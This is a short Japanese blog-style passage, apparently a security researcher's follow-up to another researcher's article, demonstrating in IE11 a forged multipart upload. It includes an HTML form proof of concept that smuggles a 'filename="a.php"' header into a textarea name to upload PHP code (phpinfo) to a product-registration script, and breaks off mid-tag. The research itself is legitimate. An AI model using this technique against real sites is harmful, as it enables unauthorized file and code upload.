徳丸さんこのの記事をよんでいてこれ、IE11でもできたきがしたので検証しました。 たしかに徳丸さんの検証しているPoCを利用すると、name=の中のダブルクォートが%22になります。 しかし、これは以下のようにすることで回避できます。 <form enctype="multipart/form-data" action="pro_add_check.php" method="POST"> <input name="name" value="nnnn" type="hidden"> <input name="price" value="100" type="hidden"> <textarea name='gazou"; filename="a.php" Content-Type: text/plain; charset=Shift_JIS'> <? phpinfo();?> </texta